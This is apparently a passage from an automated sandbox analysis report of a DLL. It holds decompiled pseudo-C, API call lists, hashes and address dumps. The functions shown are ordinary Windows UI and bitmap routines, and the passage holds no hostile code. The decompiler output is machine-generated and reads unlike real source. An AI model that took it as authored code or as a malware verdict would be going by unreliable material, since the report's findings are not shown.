                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Delete$CloseOpenlstrlen
                                                                                                        • String ID: Apartment$Both$Free$InprocServer32$Insertable$ThreadingModel
                                                                                                        • API String ID: 46240047-3148118246
                                                                                                        • Opcode ID: 073cbeeb0217bceb2ea807490113cd0039e5057ef3b856f867f9ca9f5b99c73c
                                                                                                        • Instruction ID: 6343040d0effde12503f252619630cd0662dcb6e40347e3624ec645e91b71008
                                                                                                        • Opcode Fuzzy Hash: 073cbeeb0217bceb2ea807490113cd0039e5057ef3b856f867f9ca9f5b99c73c
                                                                                                        • Instruction Fuzzy Hash: A3219631A00365BFEB52CE90CC85F5B37A9DB06BD6F014514FE42AE1A0C7769E1587A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 92%
                                                                                                        			E10034702(void* __ebx, struct HWND__* _a4, intOrPtr _a8, short _a12, signed int _a16) {
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t31;
                                                                                                        				signed int _t33;
                                                                                                        				void* _t40;
                                                                                                        				int _t46;
                                                                                                        				void* _t51;
                                                                                                        				intOrPtr _t52;
                                                                                                        				signed int _t58;
                                                                                                        				signed int* _t66;
                                                                                                        				void* _t67;
                                                                                                        				signed int _t68;
                                                                                                        				signed int _t70;
                                                                                                        
                                                                                                        				_t51 = __ebx;
                                                                                                        				if(_a4 != 0) {
                                                                                                        					_push(_t67);
                                                                                                        					_push(0x10008389);
                                                                                                        					_t54 = 0x10097504;
                                                                                                        					_t68 = E1002A0B5(__ebx, 0x10097504, 0, _t67, __eflags);
                                                                                                        					__eflags = _t68;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						E1000836F(__ebx, 0x10097504, 0, _t68, __eflags);
                                                                                                        					}
                                                                                                        					__eflags =  *(_t68 + 0x18);
                                                                                                        					if(__eflags != 0) {
                                                                                                        						__eflags = E1000E60C(_t54, 0, _t68, __eflags, _a4);
                                                                                                        						if(__eflags == 0) {
                                                                                                        							_t54 =  *(_t68 + 0x18);
                                                                                                        							E1000F2EF( *(_t68 + 0x18), __eflags, _a4);
                                                                                                        							 *(_t68 + 0x18) = 0;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_push(_t51);
                                                                                                        					_t52 = _a8;
                                                                                                        					__eflags = _t52 - 0x110;
                                                                                                        					if(_t52 != 0x110) {
                                                                                                        						__eflags = _t52 -  *0x10099210; // 0x0
                                                                                                        						if(__eflags == 0) {
                                                                                                        							L25:
                                                                                                        							SendMessageA(_a4, 0x111, 0xe146, 0);
                                                                                                        							_t31 = 1;
                                                                                                        							__eflags = 1;
                                                                                                        							goto L26;
                                                                                                        						}
                                                                                                        						__eflags = _t52 - 0x111;
                                                                                                        						if(_t52 != 0x111) {
                                                                                                        							L12:
                                                                                                        							__eflags = _t52 - 0xc000;
                                                                                                        							if(__eflags < 0) {
                                                                                                        								L22:
                                                                                                        								_t31 = 0;
                                                                                                        								goto L26;
                                                                                                        							}
                                                                                                        							_t70 = E1000E60C(_t54, 0x110, _t68, __eflags, _a4);
                                                                                                        							__eflags = _t70;
                                                                                                        							if(_t70 == 0) {
                                                                                                        								goto L22;
                                                                                                        							}
                                                                                                        							_t33 = E1002566C(_t70, 0x1005f4bc);
                                                                                                        							__eflags = _t33;
                                                                                                        							if(_t33 == 0) {
                                                                                                        								L16:
                                                                                                        								__eflags = _t52 -  *0x10099204; // 0x0
                                                                                                        								if(__eflags != 0) {
                                                                                                        									__eflags = _t52 -  *0x10099208; // 0x0
                                                                                                        									if(__eflags != 0) {
                                                                                                        										__eflags = _t52 -  *0x10099200; // 0x0
                                                                                                        										if(__eflags != 0) {
                                                                                                        											__eflags = _t52 -  *0x1009920c; // 0x0
                                                                                                        											if(__eflags != 0) {
                                                                                                        												goto L22;
                                                                                                        											}
                                                                                                        											_t31 =  *((intOrPtr*)( *_t70 + 0x15c))();
                                                                                                        											goto L26;
                                                                                                        										}
                                                                                                        										_t58 = _a16 >> 0x10;
                                                                                                        										__eflags = _t58;
                                                                                                        										 *((intOrPtr*)( *_t70 + 0x164))(_a12, _a16 & 0x0000ffff, _t58);
                                                                                                        										goto L22;
                                                                                                        									}
                                                                                                        									_t19 = _t70 + 0x1c4; // 0x1c4
                                                                                                        									_t66 = _t19;
                                                                                                        									 *_t66 = _a16;
                                                                                                        									_t31 =  *((intOrPtr*)( *_t70 + 0x160))();
                                                                                                        									 *_t66 =  *_t66 & 0x00000000;
                                                                                                        									goto L26;
                                                                                                        								}
                                                                                                        								_t31 =  *((intOrPtr*)( *_t70 + 0x15c))(_a16);
                                                                                                        								goto L26;
                                                                                                        							}
                                                                                                        							_t40 = E10038FF1(_t70);
                                                                                                        							__eflags =  *(_t40 + 0x34) & 0x00080000;
                                                                                                        							if(( *(_t40 + 0x34) & 0x00080000) != 0) {
                                                                                                        								goto L22;
                                                                                                        							}
                                                                                                        							goto L16;
                                                                                                        						}
                                                                                                        						__eflags = _a12 - 0x40e;
                                                                                                        						if(_a12 == 0x40e) {
                                                                                                        							goto L25;
                                                                                                        						}
                                                                                                        						goto L12;
                                                                                                        					} else {
                                                                                                        						 *0x10099200 = RegisterWindowMessageA("commdlg_LBSelChangedNotify");
                                                                                                        						 *0x10099204 = RegisterWindowMessageA("commdlg_ShareViolation");
                                                                                                        						 *0x10099208 = RegisterWindowMessageA("commdlg_FileNameOK");
                                                                                                        						 *0x1009920c = RegisterWindowMessageA("commdlg_ColorOK");
                                                                                                        						 *0x10099210 = RegisterWindowMessageA("commdlg_help");
                                                                                                        						_t46 = RegisterWindowMessageA("commdlg_SetRGBColor");
                                                                                                        						_push(_a16);
                                                                                                        						 *0x10099214 = _t46;
                                                                                                        						_push(_a12);
                                                                                                        						_t31 = E1000998B(_t54, 0x110, RegisterWindowMessageA, _a4, 0x110);
                                                                                                        						L26:
                                                                                                        						return _t31;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				return 0;
                                                                                                        			}


















                                                                                                        APIs
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_LBSelChangedNotify,?,10008389), ref: 10034766
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_ShareViolation,?,10008389), ref: 10034772
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_FileNameOK,?,10008389), ref: 1003477E
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_ColorOK,?,10008389), ref: 1003478A
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_help,?,10008389), ref: 10034796
                                                                                                        • RegisterWindowMessageA.USER32(commdlg_SetRGBColor,?,10008389), ref: 100347A2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageRegisterWindow
                                                                                                        • String ID: commdlg_ColorOK$commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                        • API String ID: 1814269913-3888057576
                                                                                                        • Opcode ID: d6e08308a8e5cae5ea31bed95bdc5af91660088502b1168ecda17d037fb221df
                                                                                                        • Instruction ID: 6d26702c7da3de746ce7f513fd18e9b1b036692a328635f30a4b6431958f008d
                                                                                                        • Opcode Fuzzy Hash: d6e08308a8e5cae5ea31bed95bdc5af91660088502b1168ecda17d037fb221df
                                                                                                        • Instruction Fuzzy Hash: 4F4175385006A6AFEB26DF25CC889AE3BE1FB44391F124426F9495F261DF31BD50CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 96%
                                                                                                        			E10011EEF(signed int _a4, signed int _a8, struct HDC__* _a12) {
                                                                                                        				void* _v8;
                                                                                                        				void* _v12;
                                                                                                        				void* _v16;
                                                                                                        				void* _v20;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				void* _t52;
                                                                                                        				void* _t53;
                                                                                                        				void* _t56;
                                                                                                        				signed int _t63;
                                                                                                        				struct HDC__* _t64;
                                                                                                        				struct HBITMAP__* _t65;
                                                                                                        				struct HDC__* _t69;
                                                                                                        				void* _t76;
                                                                                                        				struct HDC__* _t79;
                                                                                                        				intOrPtr* _t82;
                                                                                                        				void* _t91;
                                                                                                        				signed int _t92;
                                                                                                        				intOrPtr _t100;
                                                                                                        				int* _t101;
                                                                                                        				int _t102;
                                                                                                        				void* _t103;
                                                                                                        				BITMAPINFO* _t104;
                                                                                                        				void* _t106;
                                                                                                        
                                                                                                        				_t52 = LoadResource(_a4, _a8);
                                                                                                        				_v20 = _t52;
                                                                                                        				if(_t52 == 0) {
                                                                                                        					return _t52;
                                                                                                        				}
                                                                                                        				_t53 = LockResource(_t52);
                                                                                                        				_t76 = _t53;
                                                                                                        				_v16 = _t76;
                                                                                                        				if(_t76 == 0) {
                                                                                                        					L17:
                                                                                                        					return _t53;
                                                                                                        				}
                                                                                                        				_push(_t103);
                                                                                                        				_t98 =  *_t76 + 0x40;
                                                                                                        				_t53 = E1003A230(_t76, _t91,  *_t76 + 0x40, _t103,  *_t76 + 0x40);
                                                                                                        				_t104 = _t53;
                                                                                                        				if(_t104 == 0) {
                                                                                                        					L16:
                                                                                                        					goto L17;
                                                                                                        				} else {
                                                                                                        					E10007E59(_t98, _t104, _t106, _t104, _t98, _t76, _t98);
                                                                                                        					_t56 = _t104 + _t104->bmiHeader;
                                                                                                        					_a8 = _a8 & 0x00000000;
                                                                                                        					_v12 = _t56;
                                                                                                        					do {
                                                                                                        						_t82 = _t56 + _a8 * 4;
                                                                                                        						_t100 =  *_t82;
                                                                                                        						_t92 = 0;
                                                                                                        						_v8 = _t82;
                                                                                                        						while(_t100 !=  *((intOrPtr*)(0x10059d74 + _t92 * 8))) {
                                                                                                        							_t92 = _t92 + 1;
                                                                                                        							if(_t92 < 4) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        						__eflags = _a12;
                                                                                                        						if(_a12 == 0) {
                                                                                                        							_t101 = 0x10059d78 + _t92 * 8;
                                                                                                        							_a4 = GetSysColor( *_t101) & 0x000000ff;
                                                                                                        							GetSysColor( *_t101);
                                                                                                        							_a4 = _a4 << 8;
                                                                                                        							_t63 = GetSysColor( *_t101) >> 0x00000010 & 0x000000ff | _a4;
                                                                                                        							__eflags = _t63;
                                                                                                        							 *_v8 = _t63;
                                                                                                        							_t56 = _v12;
                                                                                                        						} else {
                                                                                                        							__eflags =  *(0x10059d78 + _t92 * 8) - 0x12;
                                                                                                        							if(__eflags != 0) {
                                                                                                        								 *_t82 = 0xffffff;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						L12:
                                                                                                        						_a8 = _a8 + 1;
                                                                                                        					} while (_a8 < 0x10);
                                                                                                        					_t102 = _t104->bmiHeader.biWidth;
                                                                                                        					_t79 = _t104->bmiHeader.biHeight;
                                                                                                        					_a4 = _t102;
                                                                                                        					_a8 = _t79;
                                                                                                        					_t64 = GetDC(0);
                                                                                                        					_a12 = _t64;
                                                                                                        					_t65 = CreateCompatibleBitmap(_t64, _t102, _t79);
                                                                                                        					_v8 = _t65;
                                                                                                        					if(_t65 != 0) {
                                                                                                        						_t69 = CreateCompatibleDC(_a12);
                                                                                                        						_t102 = SelectObject;
                                                                                                        						_t79 = _t69;
                                                                                                        						_v12 = SelectObject(_t79, _v8);
                                                                                                        						StretchDIBits(_t79, 0, 0, _a4, _a8, 0, 0, _a4, _a8, _v16 + 0x28 + (1 << _t104->bmiHeader.biBitCount) * 4, _t104, 0, 0xcc0020);
                                                                                                        						SelectObject(_t79, _v12);
                                                                                                        						DeleteDC(_t79);
                                                                                                        					}
                                                                                                        					ReleaseDC(0, _a12);
                                                                                                        					_push(_t104);
                                                                                                        					E10039F30(_t79, _t102, _t104, 0);
                                                                                                        					FreeResource(_v20);
                                                                                                        					_t53 = _v8;
                                                                                                        					goto L16;
                                                                                                        				}
                                                                                                        			}






























                                                                                                        APIs
                                                                                                        • LoadResource.KERNEL32(?,?), ref: 10011EFB
                                                                                                        • LockResource.KERNEL32(00000000), ref: 10011F0E
                                                                                                        • _malloc.LIBCMT ref: 10011F29
                                                                                                          • Part of subcall function 1003A230: __FF_MSGBANNER.LIBCMT ref: 1003A253
                                                                                                          • Part of subcall function 1003A230: __NMSG_WRITE.LIBCMT ref: 1003A25A
                                                                                                          • Part of subcall function 1003A230: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,100416EE,?,00000001,00000001,100408A6,00000018,1006CDA0,0000000C,10040935,00000001), ref: 1003A2A8
                                                                                                          • Part of subcall function 10007E59: _memcpy_s.LIBCMT ref: 10007E69
                                                                                                        • GetSysColor.USER32 ref: 10011F95
                                                                                                        • GetSysColor.USER32 ref: 10011F9F
                                                                                                        • GetSysColor.USER32 ref: 10011FB1
                                                                                                        • GetDC.USER32(00000000), ref: 10011FDB
                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 10011FE7
                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 10011FF7
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 10012009
                                                                                                        • StretchDIBits.GDI32(00000000,00000000,00000000,00000008,00000010,00000000,00000000,00000008,00000010,?,00000000,00000000,00CC0020), ref: 10012038
                                                                                                        • SelectObject.GDI32(00000000,00000008), ref: 10012042
                                                                                                        • DeleteDC.GDI32(00000000), ref: 10012045
                                                                                                        • ReleaseDC.USER32 ref: 10012050
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 10012060
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ColorResource$CompatibleCreateObjectSelect$AllocateBitmapBitsDeleteFreeHeapLoadLockReleaseStretch_malloc_memcpy_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 2870220007-0
                                                                                                        • Opcode ID: 992ce404a7c3b8a6a9d6393e2e7ab8712d75b85ffc005dc4d8c38dc4d2ccf487
                                                                                                        • Instruction ID: 3ec1eb51cf0d876659863412adbc1939ba0711b9f1e2081631734deed92cc252
                                                                                                        • Opcode Fuzzy Hash: 992ce404a7c3b8a6a9d6393e2e7ab8712d75b85ffc005dc4d8c38dc4d2ccf487
                                                                                                        • Instruction Fuzzy Hash: 76417C75900218EFEB01DFA4CC84AEE7BB9EF48351B108429F9169B2A1D730DA61DF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 64%
                                                                                                        			E1002E1CC(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20) {
                                                                                                        				RECT* _v8;
                                                                                                        				struct HWND__* _v12;
                                                                                                        				char _v16;
                                                                                                        				char _v20;
                                                                                                        				signed int _v24;
                                                                                                        				signed int* _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				struct tagRECT _v52;
                                                                                                        				struct tagRECT _v68;
                                                                                                        				struct tagMSG _v96;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t111;
                                                                                                        				signed int _t121;
                                                                                                        				struct HDC__* _t123;
                                                                                                        				intOrPtr _t124;
                                                                                                        				void* _t128;
                                                                                                        				signed int _t130;
                                                                                                        				signed int _t131;
                                                                                                        				signed int _t138;
                                                                                                        				signed int _t140;
                                                                                                        				signed int _t145;
                                                                                                        				intOrPtr* _t146;
                                                                                                        				int _t151;
                                                                                                        				int _t155;
                                                                                                        				signed int _t161;
                                                                                                        				intOrPtr* _t169;
                                                                                                        				signed int _t172;
                                                                                                        				signed int* _t173;
                                                                                                        				signed int _t180;
                                                                                                        				signed int _t185;
                                                                                                        				signed int _t187;
                                                                                                        				intOrPtr _t189;
                                                                                                        				signed int _t191;
                                                                                                        				intOrPtr* _t196;
                                                                                                        				struct HWND__* _t197;
                                                                                                        				void* _t203;
                                                                                                        
                                                                                                        				_t181 = __edx;
                                                                                                        				_t170 = __ecx;
                                                                                                        				_t169 = __ecx;
                                                                                                        				if(GetCapture() == 0) {
                                                                                                        					E1002A45C(__eflags);
                                                                                                        					_t189 = _a8;
                                                                                                        					_t196 = _t169 + 8;
                                                                                                        					_v8 = _t196;
                                                                                                        					_v32 =  *((intOrPtr*)(_t196 + 8)) -  *_t196;
                                                                                                        					_v36 =  *((intOrPtr*)(_t196 + 0xc)) -  *((intOrPtr*)(_t196 + 4));
                                                                                                        					E1000E5E5(_t169, _t170, _t203, SetCapture( *(_t189 + 0x20)));
                                                                                                        					UpdateWindow( *(_t189 + 0x20));
                                                                                                        					_t111 = _a20;
                                                                                                        					__eflags = _t111;
                                                                                                        					if(_t111 != 0) {
                                                                                                        						UpdateWindow( *(_t111 + 0x20));
                                                                                                        					}
                                                                                                        					_t191 =  &_v68;
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					asm("movsd");
                                                                                                        					_t171 = _t169;
                                                                                                        					asm("movsd");
                                                                                                        					E1002DCB6(_t169, _a4,  &_v24,  &_v28,  &_v16,  &_v20);
                                                                                                        					_t197 = 0;
                                                                                                        					_v16 = _a12 - _v16;
                                                                                                        					_v20 = _a16 - _v20;
                                                                                                        					_t121 = _a20;
                                                                                                        					__eflags = _t121;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						_t123 = GetDC( *(_a8 + 0x20));
                                                                                                        					} else {
                                                                                                        						_t123 = GetDCEx( *(_t121 + 0x20), 0, 2);
                                                                                                        					}
                                                                                                        					_push(_t123);
                                                                                                        					_t124 = E10008F77(_t169, _t171, _t191, _t197, __eflags);
                                                                                                        					__eflags = _t124 - _t197;
                                                                                                        					_a16 = _t124;
                                                                                                        					if(__eflags == 0) {
                                                                                                        						E1000836F(_t169, _t171, _t191, _t197, __eflags);
                                                                                                        					}
                                                                                                        					_v12 = _t197;
                                                                                                        					while(1) {
                                                                                                        						GetMessageA( &_v96, _t197, _t197, _t197);
                                                                                                        						_t128 = E1000E5E5(_t169, _t171, _t203, GetCapture());
                                                                                                        						__eflags = _t128 - _a8;
                                                                                                        						if(_t128 != _a8) {
                                                                                                        							break;
                                                                                                        						}
                                                                                                        						_t171 = 0x100;
                                                                                                        						_t130 = _v96.message - 0x100;
                                                                                                        						__eflags = _t130;
                                                                                                        						if(_t130 == 0) {
                                                                                                        							__eflags = _v96.wParam - 0x1b;
                                                                                                        							if(_v96.wParam != 0x1b) {
                                                                                                        								continue;
                                                                                                        							}
                                                                                                        							L34:
                                                                                                        							__eflags = _v12 - _t197;
                                                                                                        							if(_v12 != _t197) {
                                                                                                        								__eflags = 1;
                                                                                                        								 *(_t169 + 0x44) = 1;
                                                                                                        								 *(_t169 + 0x40) = 1;
                                                                                                        								_t171 = _t169;
                                                                                                        								 *((intOrPtr*)( *_t169))(_v8, _a20, _a16, _a8);
                                                                                                        							}
                                                                                                        							_t191 = _v8;
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							L37:
                                                                                                        							_t197 = 0;
                                                                                                        							__eflags = 0;
                                                                                                        							L38:
                                                                                                        							_t131 = _a20;
                                                                                                        							__eflags = _t131 - _t197;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								_push( *((intOrPtr*)(_a16 + 4)));
                                                                                                        								_push( *(_a8 + 0x20));
                                                                                                        							} else {
                                                                                                        								_t171 = _a16;
                                                                                                        								_push( *((intOrPtr*)(_a16 + 4)));
                                                                                                        								_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                                        							}
                                                                                                        							ReleaseDC();
                                                                                                        							ReleaseCapture();
                                                                                                        							E1002A66D(_t171, _t181, _t191, __eflags, _t197);
                                                                                                        							__eflags = _v12 - _t197;
                                                                                                        							if(_v12 == _t197) {
                                                                                                        								asm("movsd");
                                                                                                        								asm("movsd");
                                                                                                        								asm("movsd");
                                                                                                        								asm("movsd");
                                                                                                        								_t197 = 0;
                                                                                                        								__eflags = 0;
                                                                                                        							}
                                                                                                        							 *(_t169 + 0x44) = _t197;
                                                                                                        							 *(_t169 + 0x40) = _t197;
                                                                                                        							_t138 = EqualRect( &_v68, _v8);
                                                                                                        							asm("sbb eax, eax");
                                                                                                        							_t140 = 1 +  ~_t138;
                                                                                                        							__eflags = _t140;
                                                                                                        							return _t140;
                                                                                                        						}
                                                                                                        						_t145 = _t130 - 0x100;
                                                                                                        						__eflags = _t145;
                                                                                                        						if(_t145 == 0) {
                                                                                                        							L15:
                                                                                                        							_t146 = _v8;
                                                                                                        							_t172 = _v24;
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							asm("movsd");
                                                                                                        							_t191 = 0;
                                                                                                        							__eflags = _t172;
                                                                                                        							if(_t172 != 0) {
                                                                                                        								_t187 = _v96.lParam - _v16;
                                                                                                        								__eflags = _t187;
                                                                                                        								 *_t172 = _t187;
                                                                                                        							}
                                                                                                        							_t173 = _v28;
                                                                                                        							__eflags = _t173 - _t191;
                                                                                                        							if(_t173 != _t191) {
                                                                                                        								_t185 = (_v96.lParam >> 0x10) - _v20;
                                                                                                        								__eflags = _t185;
                                                                                                        								 *_t173 = _t185;
                                                                                                        							}
                                                                                                        							__eflags = _a4 - 8;
                                                                                                        							if(_a4 == 8) {
                                                                                                        								 *((intOrPtr*)(_t169 + 0x10)) =  *_t146 + _v32;
                                                                                                        								_t180 =  *((intOrPtr*)(_t169 + 0xc)) + _v36;
                                                                                                        								__eflags = _t180;
                                                                                                        								 *(_t169 + 0x14) = _t180;
                                                                                                        							}
                                                                                                        							_t181 =  *_t169;
                                                                                                        							_t171 = _t169;
                                                                                                        							 *((intOrPtr*)( *_t169 + 4))(_a4, _t146);
                                                                                                        							__eflags = _v96.message - 0x202;
                                                                                                        							 *(_t169 + 0x44) = 0 | _v96.message == 0x00000202;
                                                                                                        							_t151 = EqualRect( &_v52, _v8);
                                                                                                        							__eflags = _t151;
                                                                                                        							if(_t151 == 0) {
                                                                                                        								L23:
                                                                                                        								__eflags = _v12 - _t191;
                                                                                                        								if(_v12 != _t191) {
                                                                                                        									 *(_t169 + 0x40) = 1;
                                                                                                        									 *((intOrPtr*)( *_t169))( &_v52, _a20, _a16, _a8);
                                                                                                        								}
                                                                                                        								_t171 = _t169;
                                                                                                        								 *((intOrPtr*)( *_t169 + 8))( &_v52);
                                                                                                        								__eflags = _v96.message - 0x202;
                                                                                                        								if(_v96.message != 0x202) {
                                                                                                        									_v12 = 1;
                                                                                                        								}
                                                                                                        								__eflags =  *(_t169 + 0x44) - _t191;
                                                                                                        								if( *(_t169 + 0x44) != _t191) {
                                                                                                        									goto L37;
                                                                                                        								} else {
                                                                                                        									goto L28;
                                                                                                        								}
                                                                                                        							} else {
                                                                                                        								__eflags =  *(_t169 + 0x44) - _t191;
                                                                                                        								if( *(_t169 + 0x44) == _t191) {
                                                                                                        									L28:
                                                                                                        									_t155 = EqualRect( &_v52, _v8);
                                                                                                        									__eflags = _t155;
                                                                                                        									if(_t155 == 0) {
                                                                                                        										_t71 = _t169 + 0x40;
                                                                                                        										 *_t71 =  *(_t169 + 0x40) & _t191;
                                                                                                        										__eflags =  *_t71;
                                                                                                        										_t171 = _t169;
                                                                                                        										 *((intOrPtr*)( *_t169))(_v8, _a20, _a16, _a8);
                                                                                                        									}
                                                                                                        									_t197 = 0;
                                                                                                        									__eflags = 0;
                                                                                                        									continue;
                                                                                                        								}
                                                                                                        								goto L23;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t161 = _t145;
                                                                                                        						__eflags = _t161;
                                                                                                        						if(_t161 == 0) {
                                                                                                        							goto L15;
                                                                                                        						}
                                                                                                        						__eflags = _t161 == 0;
                                                                                                        						if(_t161 == 0) {
                                                                                                        							goto L34;
                                                                                                        						}
                                                                                                        						DispatchMessageA( &_v96);
                                                                                                        					}
                                                                                                        					goto L38;
                                                                                                        				}
                                                                                                        				return 0;
                                                                                                        			}
                                                                                                        0x1002e43b
                                                                                                        0x1002e43c
                                                                                                        0x1002e43d
                                                                                                        0x1002e43e
                                                                                                        0x1002e43f
                                                                                                        0x1002e43f
                                                                                                        0x1002e43f
                                                                                                        0x1002e448
                                                                                                        0x1002e44b
                                                                                                        0x1002e44e
                                                                                                        0x1002e456
                                                                                                        0x1002e459
                                                                                                        0x1002e459
                                                                                                        0x00000000
                                                                                                        0x1002e45a
                                                                                                        0x1002e2ad
                                                                                                        0x1002e2ad
                                                                                                        0x1002e2af
                                                                                                        0x1002e2cc
                                                                                                        0x1002e2cc
                                                                                                        0x1002e2cf
                                                                                                        0x1002e2d7
                                                                                                        0x1002e2d8
                                                                                                        0x1002e2d9
                                                                                                        0x1002e2da
                                                                                                        0x1002e2db
                                                                                                        0x1002e2dd
                                                                                                        0x1002e2df
                                                                                                        0x1002e2e5
                                                                                                        0x1002e2e5
                                                                                                        0x1002e2e8
                                                                                                        0x1002e2e8
                                                                                                        0x1002e2ea
                                                                                                        0x1002e2ed
                                                                                                        0x1002e2ef
                                                                                                        0x1002e2fa
                                                                                                        0x1002e2fa
                                                                                                        0x1002e2fd
                                                                                                        0x1002e2fd
                                                                                                        0x1002e2ff
                                                                                                        0x1002e303
                                                                                                        0x1002e30a
                                                                                                        0x1002e310
                                                                                                        0x1002e310
                                                                                                        0x1002e313
                                                                                                        0x1002e313
                                                                                                        0x1002e316
                                                                                                        0x1002e31c
                                                                                                        0x1002e31e
                                                                                                        0x1002e32b
                                                                                                        0x1002e331
                                                                                                        0x1002e338
                                                                                                        0x1002e33e
                                                                                                        0x1002e340
                                                                                                        0x1002e347
                                                                                                        0x1002e347
                                                                                                        0x1002e34a
                                                                                                        0x1002e35a
                                                                                                        0x1002e364
                                                                                                        0x1002e364
                                                                                                        0x1002e36c
                                                                                                        0x1002e36e
                                                                                                        0x1002e371
                                                                                                        0x1002e374
                                                                                                        0x1002e376
                                                                                                        0x1002e376
                                                                                                        0x1002e37d
                                                                                                        0x1002e380
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e342
                                                                                                        0x1002e342
                                                                                                        0x1002e345
                                                                                                        0x1002e382
                                                                                                        0x1002e389
                                                                                                        0x1002e38f
                                                                                                        0x1002e391
                                                                                                        0x1002e39b
                                                                                                        0x1002e39b
                                                                                                        0x1002e39b
                                                                                                        0x1002e3a1
                                                                                                        0x1002e3a6
                                                                                                        0x1002e3a6
                                                                                                        0x1002e3a8
                                                                                                        0x1002e3a8
                                                                                                        0x00000000
                                                                                                        0x1002e3a8
                                                                                                        0x00000000
                                                                                                        0x1002e345
                                                                                                        0x1002e340
                                                                                                        0x1002e2b2
                                                                                                        0x1002e2b2
                                                                                                        0x1002e2b3
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e2b6
                                                                                                        0x1002e2b7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002e2c1
                                                                                                        0x1002e2c1
                                                                                                        0x00000000
                                                                                                        0x1002e3cc
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • GetCapture.USER32 ref: 1002E1D5
                                                                                                        • SetCapture.USER32(?,?,?,?,?,?,?,?,1002E493,00000000,?,?,?,?,?,?), ref: 1002E20A
                                                                                                        • UpdateWindow.USER32(?), ref: 1002E21F
                                                                                                        • UpdateWindow.USER32(?), ref: 1002E22B
                                                                                                        • GetDCEx.USER32(?,00000000,00000002,?,00000000,?,?,?,?,?,?,?,?,1002E493,00000000,?), ref: 1002E26F
